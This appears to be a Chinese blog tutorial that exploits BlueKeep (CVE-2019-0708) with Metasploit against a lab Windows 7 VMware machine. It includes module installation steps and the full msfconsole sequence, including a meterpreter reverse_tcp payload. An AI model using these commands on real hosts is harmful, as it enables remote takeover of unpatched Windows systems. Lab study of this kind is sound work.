cve2019-0708漏洞利用

利用metasploit对windows 7 x64主机进行攻击

添加CVE2019-0708漏洞exp

exp链接:https://github.com/rapid7/metasploit-framework/tree/5a0119b04309c8e61b44763ac08811cd3ecbbf8d/modules/exploits/windows/rdp

添加步骤:

README

CVE-2019-0708 (Bluekeep)

Metasploit module for CVE-2019-0708 (BlueKeep)

Pulled from
https://github.com/rapid7/metasploit-framework/tree/5a0119b04309c8e61b44763ac08811cd3ecbbf8d/modules/exploits/windows/rdp
and fixed

File copy instructions

  1. Make a folder named ‘rdp’ in /usr/share/metasploit-framework/modules/exploits/windows/
  2. Copy the files ‘cve_2019_0708_bluekeep_rce.rb’ in the folder
  3. Replace the files in following folders:
    • rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
    • rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp
    • cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

(!!!原文件做好备份!!!)

以免添加后由于各种原因导致metasploit不能正常运行 (可能)

1、在 /usr/share/metasploit-framework/modules/exploits/windows/ 下创建一个名为rdp的文件夹
2、把 cve_2019_0708_bluekeep_rce.rb 复制到刚刚创建的rdp文件夹内
3、把 rdp.rb 替换到 /usr/share/metasploit-framework/lib/msf/core/exploit/
4、把 rdp_scanner.rb 替换到 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp
5、把 cve_2019_0708_bluekeep.rb 替换到 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

metasploit

msfconsole

重新加载exp:

reload_all

选择exp:

search 0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

cve2019-0708漏洞利用_第1张图片

show options

设置目标IP

set rhosts 192.168.90.128

设置攻击载荷

show payloads

set payload set payload windows/x64/meterpreter/reverse_tcp

设置本机IP

set lhost 192.168.90.1

根据具体情况设置target

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)

3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

因为是攻击运行在VMware上的Windows 7,所以target设置3

set target 3

所有配置如图

cve2019-0708漏洞利用_第2张图片

最后开始攻击

 fuck

cve2019-0708漏洞利用_第3张图片

完事儿

你可能感兴趣的:(渗透)